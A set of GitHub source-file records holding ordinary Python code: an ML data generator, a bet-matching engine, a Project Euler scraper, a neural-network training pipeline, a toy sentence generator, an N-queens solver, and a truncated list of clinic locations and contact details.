+{"seq_id":"28891262561","text":"\nimport numpy as np\n\nfrom threading import Semaphore, Thread\nfrom time import sleep\nfrom random import choice, randint\nfrom pdb import set_trace as pause\n\nclass DataGenerator(object):\n\n\tdef __init__(\tself, data, process_data_item_func, xshape, yshape, \\\n\t\t\t\t\tdata_item_selector\t= choice, \t\\\n\t\t\t\t\tnthreads\t\t\t= 2,\t\t\\\n\t\t\t\t\tpool_size\t\t\t= 1000,\t\t\\\n\t\t\t\t\tmin_nsamples\t\t= 1,\t\t\\\n\t\t\t\t\tdtype \t\t\t\t= 'single' ):\n\n\t\tassert pool_size >= min_nsamples, \\\n\t\t\t'Min. samples must be equal or less than pool_size'\n\t\tassert min_nsamples > 0 and pool_size > 0, \\\n\t\t\t'Min. samples and pool size must be positive non-zero numbers'\n\n\t\tself._data = data\n\t\tself._process_data_item = process_data_item_func\n\t\tself._data_item_selector = data_item_selector\n\t\tself._xshape = xshape\n\t\tself._yshape = yshape\n\t\tself._nthreads = nthreads\n\t\tself._pool_size = pool_size\n\t\tself._min_nsamples = min_nsamples\n\t\tself._dtype = dtype\n\t\t\n\t\tself._count = 0\n\t\tself._stop = False\n\t\tself._threads = []\n\t\tself._sem = Semaphore()\n\n\t\tself._X, self._Y = self._get_buffers(self._pool_size)\n\n\n\tdef _get_buffers(self,N):\n\t\tX = np.empty((N,) + self._xshape, dtype=self._dtype)\n\t\tY = np.empty((N,) + self._yshape, dtype=self._dtype)\n\t\treturn X,Y\n\n\tdef _compute_sample(self):\n\t\td = self._data_item_selector(self._data)\n\t\treturn self._process_data_item(d)\n\n\tdef _insert_data(self,x,y):\n\n\t\tself._sem.acquire()\n\n\t\tif self._count < self._pool_size:\n\t\t\tself._X[self._count] = x\n\t\t\tself._Y[self._count] = y\n\t\t\tself._count += 1\n\t\telse:\n\t\t\tidx = randint(0,self._pool_size-1)\n\t\t\tself._X[idx] = x\n\t\t\tself._Y[idx] = y\n\n\t\tself._sem.release()\n\n\tdef _run(self):\n\t\twhile True:\n\t\t\tx,y = self._compute_sample()\n\t\t\tself._insert_data(x,y)\n\t\t\tif self._stop:\n\t\t\t\tbreak\n\n\tdef stop(self):\n\t\tself._stop = True\n\t\tfor thread in self._threads:\n\t\t\tthread.join()\n\n\tdef start(self):\n\t\tself._stop = False\n\t\tself._threads = [Thread(target=self._run) for n in range(self._nthreads)]\n\t\tfor thread in self._threads:\n\t\t\tthread.setDaemon(True)\n\t\t\tthread.start()\n\n\tdef get_batch(self,N):\n\n\t\t# Wait until the buffer was filled with the minimum\n\t\t# number of samples\n\t\twhile self._count < self._min_nsamples:\n\t\t\tsleep(.1)\n\n\t\tX,Y = self._get_buffers(N)\n\t\tself._sem.acquire()\n\t\tfor i in range(N):\n\t\t\tidx = randint(0,self._count-1)\n\t\t\tX[i] = self._X[idx]\n\t\t\tY[i] = self._Y[idx]\n\t\tself._sem.release()\n\t\treturn X,Y\n\n\n","repo_name":"sergiomsilva/alpr-unconstrained","sub_path":"src/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":1667,"dataset":"github-code","pt":"37"} +{"seq_id":"21441619760","text":"from models import Contract, Bid\n\n\ndef resolve_bet(txn, bidder, outcome, price, amount, yes_dir):\n matching_bids = [b for b in outcome.bids if b.yes_bid != yes_dir and b.price >= 100 - price]\n matching_bids = list(sorted(matching_bids, key=lambda b: (-b.price, b.bid_id)))\n while matching_bids and amount:\n bid = matching_bids.pop(0)\n\n shares_matched = min(amount, bid.amount)\n amount -= shares_matched\n\n c1 = Contract(outcome=outcome, bidder=bidder, price=100 - bid.price, amount=shares_matched,\n yes_contract=yes_dir)\n c2 = Contract(outcome=outcome, bidder=bid.bidder, price=bid.price, amount=shares_matched,\n yes_contract=not yes_dir)\n if shares_matched == bid.amount:\n txn.delete(bid)\n else:\n bid.amount -= shares_matched\n txn.add(c1)\n txn.add(c2)\n if amount:\n existing = txn.query(Bid).filter_by(bidder=bidder, outcome=outcome, price=price, yes_bid=yes_dir).first()\n if existing:\n existing.amount += amount\n else:\n bid = Bid(outcome=outcome, bidder=bidder, price=price, amount=amount, yes_bid=yes_dir)\n txn.add(bid)\n","repo_name":"jsannemo/betomator","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15112356262","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\n\n\nclass Euler:\n def __init__(self):\n self._baseUrl = 'https://projecteuler.net'\n self._problemUrl = self._baseUrl + '/problem=%s'\n\n def _generateProblemUrl(self, number):\n if number == None or number == 0 or number == '0':\n return None\n\n return self._problemUrl % number\n\n def _getUrlContent(self, url):\n if url == None:\n return None\n\n r = requests.get(url)\n if r.status_code != requests.codes.ok:\n return None\n return r.content\n\n def _getProblemFromHtml(self, htmlContent):\n if htmlContent in [None, '']:\n return None\n\n soup = BeautifulSoup(htmlContent, 'html.parser')\n\n probNotAvail = soup.findAll(text=re.compile('Problem not accessible'))\n if len(probNotAvail) > 0:\n return None\n\n try:\n ps = soup.select(\"div p\")\n s = [p.getText().replace('\\n', '') for p in ps]\n s = ' '.join(s)\n except:\n return None\n\n s = s if s != '' else None\n\n return s\n\n def _getProblem(self, number=None):\n response = dict()\n response['url'] = None\n response['description'] = None\n url = self._generateProblemUrl(number)\n\n if url is None:\n return response\n\n response['url'] = url\n content = self._getUrlContent(url)\n if content is None:\n return response\n\n response['description'] = self._getProblemFromHtml(content)\n\n return response\n\n def problem(self, number=None):\n return self._getProblem(number=number)\n","repo_name":"naren-m/euler","sub_path":"euler/euler.py","file_name":"euler.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74220015468","text":"from gunpowder import *\nfrom gunpowder.tensorflow import *\nfrom gunpowder.contrib import ZeroOutConstSections # , AddBoundaryDistance\nimport tensorflow as tf\nimport os\nimport math\nimport json\nimport logging\n\n\ndef train_until(\n max_iteration,\n cremi_dir,\n data_sources,\n input_shape,\n output_shape,\n loss_name,\n cache_size=10,\n num_workers=10,\n):\n ArrayKey(\"RAW\")\n ArrayKey(\"ALPHA_MASK\")\n ArrayKey(\"GT_LABELS\")\n ArrayKey(\"GT_MASK\")\n ArrayKey(\"TRAINING_MASK\")\n ArrayKey(\"GT_SCALE\")\n # ArrayKey('LOSS_GRADIENT')\n ArrayKey(\"PREDICTED_LABELS\")\n ArrayKey(\"PREDICTED_PROB\")\n\n data_providers = []\n if tf.train.latest_checkpoint(\".\"):\n trained_until = int(tf.train.latest_checkpoint(\".\").split(\"_\")[-1])\n print(\"Resuming training from\", trained_until)\n else:\n trained_until = 0\n print(\"Starting fresh training\")\n for sample in data_sources:\n print(sample)\n h5_source = Hdf5Source(\n os.path.join(cremi_dir, \"sample_\" + sample + \"_cleftsorig_float.hdf\"),\n datasets={\n ArrayKeys.RAW: \"volumes/raw\",\n ArrayKeys.GT_LABELS: \"volumes/labels/clefts\",\n ArrayKeys.GT_MASK: \"volumes/masks/groundtruth\",\n ArrayKeys.TRAINING_MASK: \"volumes/masks/validation\",\n },\n array_specs={\n ArrayKeys.GT_MASK: ArraySpec(interpolatable=False),\n ArrayKeys.TRAINING_MASK: ArraySpec(interpolatable=False),\n ArrayKeys.GT_LABELS: ArraySpec(interpolatable=False),\n },\n )\n data_providers.append(h5_source)\n\n # todo: dvid source\n\n with open(\"net_io_names.json\", \"r\") as f:\n net_io_names = json.load(f)\n\n voxel_size = Coordinate((40, 4, 4))\n input_size = Coordinate(input_shape) * voxel_size\n output_size = Coordinate(output_shape) * voxel_size\n # input_size = Coordinate((132,)*3) * voxel_size\n # output_size = Coordinate((44,)*3) * voxel_size\n\n # specifiy which Arrays should be requested for each batch\n request = BatchRequest()\n request.add(ArrayKeys.RAW, input_size)\n request.add(ArrayKeys.GT_LABELS, output_size)\n request.add(ArrayKeys.GT_MASK, output_size)\n request.add(ArrayKeys.TRAINING_MASK, output_size)\n request.add(ArrayKeys.GT_SCALE, output_size)\n request.add(ArrayKeys.PREDICTED_LABELS, output_size)\n request.add(ArrayKeys.PREDICTED_PROB, output_size)\n\n # create a tuple of data sources, one for each HDF file\n data_sources = tuple(\n provider\n + Normalize(ArrayKeys.RAW)\n + IntensityScaleShift( # ensures RAW is in float in [0, 1]\n ArrayKeys.TRAINING_MASK, -1, 1\n )\n +\n # zero-pad provided RAW and GT_MASK to be able to draw batches close to\n # the boundary of the available data\n # size more or less irrelevant as followed by Reject Node\n Pad(ArrayKeys.RAW, None)\n + Pad(ArrayKeys.GT_MASK, None)\n + Pad(ArrayKeys.TRAINING_MASK, None)\n + RandomLocation()\n + Reject( # chose a random location inside the provided arrays\n ArrayKeys.GT_MASK\n )\n + Reject( # reject batches wich do contain less than 50% labelled data\n ArrayKeys.TRAINING_MASK, min_masked=0.99\n )\n + Reject(ArrayKeys.GT_LABELS, min_masked=0.0, reject_probability=0.95)\n for provider in data_providers\n )\n\n snapshot_request = BatchRequest(\n {\n # ArrayKeys.LOSS_GRADIENT: request[ArrayKeys.GT_LABELS],\n ArrayKeys.PREDICTED_LABELS: request[ArrayKeys.GT_LABELS]\n }\n )\n\n artifact_source = (\n Hdf5Source(\n os.path.join(cremi_dir, \"sample_ABC_padded_20160501.defects.hdf\"),\n datasets={\n ArrayKeys.RAW: \"defect_sections/raw\",\n ArrayKeys.ALPHA_MASK: \"defect_sections/mask\",\n },\n array_specs={\n ArrayKeys.RAW: ArraySpec(voxel_size=(40, 4, 4)),\n ArrayKeys.ALPHA_MASK: ArraySpec(voxel_size=(40, 4, 4)),\n },\n )\n + RandomLocation(min_masked=0.05, mask=ArrayKeys.ALPHA_MASK)\n + Normalize(ArrayKeys.RAW)\n + IntensityAugment(ArrayKeys.RAW, 0.9, 1.1, -0.1, 0.1, z_section_wise=True)\n + ElasticAugment((4, 40, 40), (0, 2, 2), (0, math.pi / 2.0), subsample=8)\n + SimpleAugment(transpose_only=[1, 2])\n )\n\n train_pipeline = (\n data_sources\n + RandomProvider()\n + ElasticAugment(\n (4, 40, 40),\n (0.0, 2.0, 2.0),\n (0, math.pi / 2.0),\n prob_slip=0.05,\n prob_shift=0.05,\n max_misalign=10,\n subsample=8,\n )\n + SimpleAugment(transpose_only=[1, 2])\n + IntensityAugment(ArrayKeys.RAW, 0.9, 1.1, -0.1, 0.1, z_section_wise=True)\n + DefectAugment(\n ArrayKeys.RAW,\n prob_missing=0.03,\n prob_low_contrast=0.01,\n prob_artifact=0.03,\n artifact_source=artifact_source,\n artifacts=ArrayKeys.RAW,\n artifacts_mask=ArrayKeys.ALPHA_MASK,\n contrast_scale=0.5,\n )\n + IntensityScaleShift(ArrayKeys.RAW, 2, -1)\n + ZeroOutConstSections(ArrayKeys.RAW)\n + BalanceLabels(ArrayKeys.GT_LABELS, ArrayKeys.GT_SCALE, ArrayKeys.GT_MASK)\n + PreCache(cache_size=cache_size, num_workers=num_workers)\n + Train(\n \"unet\",\n optimizer=net_io_names[\"optimizer\"],\n loss=net_io_names[loss_name],\n inputs={\n net_io_names[\"raw\"]: ArrayKeys.RAW,\n net_io_names[\"gt_labels\"]: ArrayKeys.GT_LABELS,\n net_io_names[\"loss_weights\"]: ArrayKeys.GT_SCALE,\n net_io_names[\"mask\"]: ArrayKeys.GT_MASK,\n },\n summary=net_io_names[\"summary\"],\n log_dir=\"log\",\n outputs={\n net_io_names[\"probabilities\"]: ArrayKeys.PREDICTED_PROB,\n net_io_names[\"predictions\"]: ArrayKeys.PREDICTED_LABELS,\n },\n gradients={},\n )\n + Snapshot(\n {\n ArrayKeys.RAW: \"volumes/raw\",\n ArrayKeys.GT_LABELS: \"volumes/labels/gt_clefts\",\n ArrayKeys.PREDICTED_LABELS: \"volumes/labels/pred_clefts\",\n ArrayKeys.PREDICTED_PROB: \"volumes/labels/pred_prob\",\n },\n every=500,\n output_filename=\"batch_{iteration}.hdf\",\n output_dir=\"snapshots/\",\n additional_request=snapshot_request,\n )\n + PrintProfilingStats(every=50)\n )\n\n print(\"Starting training...\")\n with build(train_pipeline) as b:\n for i in range(max_iteration):\n b.request_batch(request)\n\n print(\"Training finished\")\n\n\n# if __name__ == \"__main__\":\n# logging.basicConfig(level=logging.INFO)\n# data_sources = [\"A\", \"B\", \"C\"]\n# input_shape = (43, 430, 430)\n# output_shape = (23, 218, 218)\n# max_iteration = 400000\n# loss_name = \"loss_balanced_syn\"\n# train_until(max_iteration, \"/groups/saalfeld/saalfeldlab/larissa/data/cremi-2017/\", data_sources, input_shape,\n# output_shape, loss_name)\n","repo_name":"saalfeldlab/CNNectome","sub_path":"CNNectome/training/anisotropic/train_classification.py","file_name":"train_classification.py","file_ext":"py","file_size_in_byte":7258,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"73357969067","text":"import random\nimport click\nfrom dotmap import DotMap\nimport toml\n\n\nlanguage = DotMap()\n\n@click.command()\ndef main():\n global language\n language = DotMap(toml.load(\"./languages/pseudolatin.toml\"))\n parts = [ ]\n for _ in range(random.randint(1, 3)):\n parts.append(subject())\n parts.append(predicate())\n print(\" \".join(parts) + \".\")\n\ndef subject():\n global language\n words = [ ]\n include_adjective = random.choice([ True, False, False ])\n declension = random.choice(language.misc.declensions)\n\n article = random.choice(language.words.articles)\n words.append(article + declension)\n\n if include_adjective:\n adjective = random.choice(language.words.adjectives)\n words.append(adjective + declension)\n\n noun = random.choice(language.words.nouns)\n words.append(noun + declension)\n\n return \" \".join(words)\n\ndef predicate():\n global language\n conjugation = random.choice(language.misc.conjugations)\n return random.choice(language.words.verbs) + conjugation\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HumanoidSandvichDispenser/pseudolanguage","sub_path":"generate-sentence.py","file_name":"generate-sentence.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42179340702","text":"#!/usr/bin/python3\nimport sys\n\"\"\"\nA module that contains a function that performs backtracking\nto return the number of valid placing for Non-attacking queens\n\"\"\"\n\n\ndef nqueens(N, col, not_safe=set([]), main=0):\n \"\"\"\n The nqueens function performs recursive backtracking to\n print out the various combinations for the a non-attacking\n queens of NxN chessboard\n \"\"\"\n if col >= N:\n return [[]]\n\n init = set(not_safe)\n solution = []\n possibilities = []\n for i in range(N):\n if (col, i) not in not_safe:\n solution.append([col, i])\n c = col\n rf = rb = i\n\n while c < N - 1:\n c += 1\n rf += 1\n not_safe.add((c, i))\n not_safe.add((c, rf))\n if rb >= 1:\n rb -= 1\n not_safe.add((c, rb))\n mat = nqueens(N, col + 1, not_safe)\n if mat is not None:\n for possible in mat:\n possibilities.append(solution + possible)\n solution = []\n else:\n solution.pop()\n not_safe.clear()\n not_safe.update(init)\n if main:\n for p in possibilities:\n print(p)\n if len(possibilities) > 0:\n return possibilities\n return None\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"Usage: nqueens N\")\n sys.exit(1)\n try:\n n = int(sys.argv[1])\n except (TypeError, ValueError):\n print(\"N must be a number\")\n sys.exit(1)\n if n < 4:\n print(\"N must be at least 4\")\n sys.exit(1)\n nqueens(n, 0, main=1)\n","repo_name":"shady-cj/alx-higher_level_programming","sub_path":"0x08-python-more_classes/101-nqueens.py","file_name":"101-nqueens.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40739238597","text":"locations = [\n {\n \"area\": \"Nyahururu\",\n \"county\": \"Nakuru\",\n \"link\": \"https://goo.gl/maps/57ZgCVDQZsqyFhvD8\",\n \"name\": \"Equity Afia Medical Centre, Nyahururu\",\n \"building\": \"Pongezi Mbaria Complex Building\",\n \"tel\": \"0765 000240\",\n \"email\": \"nyahururureception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kabsabet\",\n \"county\": \"Nandi\",\n \"link\": \"https://goo.gl/maps/nJKW9Mggvf89c1px8\",\n \"name\": \"Equity Afia Medical Centre, Kapsabet\",\n \"building\": \"Sonoiya Heights 1st Floor\",\n \"tel\": \"0765 000020\",\n \"email\": \"kapsabetreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kahawa Sukari\",\n \"county\": \"Nairobi/Kiambu\",\n \"link\": \"\",\n \"name\": \"Equity Afia Medical Centre, Kahawa Sukari\",\n \"building\": \"Ruhan plaza 2nd floor\",\n \"tel\": \"0765 000022\",\n \"email\": \"kahawasukarireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Donholm\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/ob8qfmvgpfPPeAPh6\",\n \"name\": \"Equity Afia Medical Centre, Donholm\",\n \"building\": \"Along Savannah Road\",\n \"tel\": \"0765 000038\",\n \"email\": \"donholmreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kakuma\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/ZZJqPTRx4d5Radxw5\",\n \"name\": \"Equity Afia Medical Centre, Kakuma\",\n \"building\": \"Opposite Lucky Petrol station\",\n \"tel\": \"0765 000110\",\n \"email\": \"kakumareception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Nkubu\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/BZXKor81EvTcHnpi7\",\n \"name\": \"Equity Afia Medical Centre, Nkubu\",\n \"building\": \"Next to KCB Building, 1st Floor\",\n \"tel\": \"0765 000108\",\n \"email\": \"eqankubureception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kinoo\",\n \"county\": \"Nairobi\",\n \"link\": \"\",\n \"name\": \"Equity Afia, Kinoo\",\n \"building\": \"Tatahotte Plaza Ground Floor along Chiefs road\",\n \"tel\": \"0765 000154 \",\n \"email\": \"kinooreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Chavakali\",\n \"county\": \"Kakamega\",\n \"link\": \"https://goo.gl/maps/WNByfzFGidccziFYA\",\n \"name\": \"Equity Afia Medical Centre, Chavakali\",\n \"building\": \"Ahulwo Plaza, next to Rubis Along Ksm -Kakamega Road.\",\n \"tel\": \"0765 000106\",\n \"email\": \"Chavakalireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Chokaa\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/kesLFehXz8xnhMM2A\",\n \"name\": \"Equity Afia Medical Centre, Chokaa\",\n \"building\": \"Hurlingham 2nd Avenue, Off Kangundo Road\",\n \"tel\": \"0765 000229\",\n \"email\": \"chokaareception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kimbo\",\n \"county\": \"Kiambu\",\n \"link\": \"https://goo.gl/maps/BWxkcf7NG1g87Mv46\",\n \"name\": \"Equity Afia Medical Centre, Kimbo\",\n \"building\": \"Lake oil petrol station, Matangi Road\",\n \"tel\": \"0765 000163\",\n \"email\": \"kimboreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Voi\",\n \"county\": \"Taita-Taveta\",\n \"link\": \"https://goo.gl/maps/2s1JYEGfqXnFjDSU7\",\n \"name\": \"Equity Afia Medical Centre, Voi\",\n \"building\": \"Maghaba Plaza Ground Floor, Kenya Power Street\",\n \"tel\": \"0765 000101\",\n \"email\": \"voireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Marsabit\",\n \"county\": \"Marsabit\",\n \"link\": \"https://goo.gl/maps/Wq6HmUjzwFDvX6Vq7\",\n \"name\": \"Equity Afia Medical Centre, Marsabit\",\n \"building\": \"Lekuton Building, Ground Floor, next to Huduma Centre\",\n \"tel\": \"0765 000066\",\n \"email\": \"marsabitreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kagemi\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/G95swKupmXFeAj7g8\",\n \"name\": \"Equity Afia Medical Centre, Kagemi\",\n \"building\": \"Range Chem Towers, 2nd Floor (Near Mountain View Mall), Waiyaki Way\",\n \"tel\": \"0765 000094\",\n \"email\": \"kagemireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Thika-Makongeni\",\n \"county\": \"Kiambu\",\n \"link\": \"https://goo.gl/maps/FBjtBFx2ejWqJAta7\",\n \"name\": \"Equity Afia Medical Centre, Thika-Makongeni\",\n \"building\": \"Makongeni Plaza, \",\n \"tel\": \"0765 000109\",\n \"email\": \"makongenireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Roysambu\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/zhqqaKLynSMd6oKJ9\",\n \"name\": \"Equity Afia Medical Centre, Roysambu\",\n \"building\": \"Shell Petrol Station-Mirema, along Kamiti Road\",\n \"tel\": \"0765 000098\",\n \"email\": \"roysambureception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kapenguria\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/B9UVtj1hK3KXUKhM8\",\n \"name\": \"Equity Afia Medical Centre, Kapenguria\",\n \"building\": \"Laikong House 2nd Floor Opposite Main Stage\",\n \"tel\": \"0765 000103\",\n \"email\": \"kapenguriareception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Wote\",\n \"county\": \"Machakos\",\n \"link\": \"https://goo.gl/maps/a9sHqMxsLPtGEm1D9\",\n \"name\": \"Equity Afia Medical Centre, Wote\",\n \"building\": \"Nesa Plaza 1st floor Opposite Rubis Petrol station - Machakos Wote Road\",\n \"tel\": \"0765 000105\",\n \"email\": \"wotereception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Westlands\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/WhZwi7KmyLkLuEtF8\",\n \"name\": \"Equity Afia, Westlands\",\n \"building\": \"Reliance Centre 1st Floor, Woodvale Groove\",\n \"tel\": \"0765 000095\",\n \"email\": \"westlandsreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Hola\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/eVJD7Fmz6f9BQE4P9\",\n \"name\": \"Equity Afia, Hola\",\n \"building\": \"Next to Ardhi House, Country Road\",\n \"tel\": \"0765 000091\",\n \"email\": \"holareception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Moi-Avenue\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/PcL6Qd446stsbxXz7\",\n \"name\": \"Equity Afia, Moi-Avenue\",\n \"building\": \"4th floor Agrho House, Moi Avenue, Nairobi CBD\",\n \"tel\": \"0765 000090\",\n \"email\": \"moiavenuereception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Tivoli\",\n \"county\": \"Kisumu\",\n \"link\": \"https://goo.gl/maps/nUwQ1GXiMoni3vzg6\",\n \"name\": \"Equity Afia, Tivoli\",\n \"building\": \"Tivoli Centre, First floor Opposite City Hall Off Achieng Oneko Road\",\n \"tel\": \"0765 000104\",\n \"email\": \"kisumureception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Githunguri\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/tSxuU63ha9Rb7f8n8\",\n \"name\": \"Equity Afia, Githunguri\",\n \"building\": \"K-unity Building, Githunguri Town\",\n \"tel\": \"0765 000099\",\n \"email\": \"githungurireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Lodwar\",\n \"county\": \"Turkana\",\n \"link\": \"https://goo.gl/maps/2umQdpv7Mtz1iwwS9\",\n \"name\": \"Equity Afia, Lodwar\",\n \"building\": \"Kanamkemer along Robert Junction, Catholic Road opposite Emojong Hardware\",\n \"tel\": \"0765 000068\",\n \"email\": \"lodwarreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am -12 midnight\",\n \"Weekends\": \"8.00 am - 7.00 pm\"\n }\n },\n {\n \"area\": \"Kiserian\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/bP4pF8aYpQ4qibW47\",\n \"name\": \"Equity Afia, Kiserian\",\n \"building\": \"Mathathi Business Centre, Magadi Road\",\n \"tel\": \"0765 000080\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Eldoret\",\n \"county\": \"Uasin Gishu\",\n \"link\": \"https://goo.gl/maps/J2RquH1SiXQKVA2S8\",\n \"name\": \"Equity Afia, Eldoret\",\n \"building\": \"Faulu Building 1st Floor along Uganda Road (Opposite Catholic Cathedral)\",\n \"tel\": \"0765 000070\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Ruai\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/tteFpMeV2Jhky4vV7\",\n \"name\": \"Equity Afia, Ruai\",\n \"building\": \"Woodlands Plaza, Equity Bank building along Kangundo Road\",\n \"tel\": \"0765 000081\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"9.00 am to 8.00 pm\"\n }\n },\n {\n \"area\": \"Kariobangi\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/tP6KziRG8Ux4YXwi7\",\n \"name\": \"Equity Afia, Kariobangi\",\n \"building\": \"Along Outering Road, Near Equity Bank\",\n \"tel\": \"0765 000083\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"9.00 am to 8.00 pm\"\n }\n },\n {\n \"area\": \"Lavington\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/5XzUcMEvmqj5KDyU7\",\n \"name\": \"Equity Afia, Lavington\",\n \"building\": \"Lavington Mall, 3rd Floor, James Gichuru Road\",\n \"tel\": \"0765 000086\",\n \"email\": \"lavingtonreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Umoja\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/kefDTkcgLWEdhMsj7\",\n \"name\": \"Equity Afia, Umoja\",\n \"building\": \"Moi Drive - Opposite PCEA Umoja 1\",\n \"tel\": \"0765 000084\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"10.00 am to 6.00 pm on Sundays\"\n }\n },\n {\n \"area\": \"Kerugoya\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/24LZs9biosoqMhd47\",\n \"name\": \"Equity Afia, Kerugoya\",\n \"building\": \"Anchor Plaza, 1st Floor Hospital road\",\n \"tel\": \"0765 000088\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"9.00 am to 6.00 pm on Sundays\"\n }\n },\n {\n \"area\": \"Mountain Mall\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/uLbLRiKNbQ3zh87C8\",\n \"name\": \"Equity Afia, Mountain Mall\",\n \"building\": \"2nd Floor Mountain Mall Building along Thika Road\",\n \"tel\": \"0765 000069\",\n 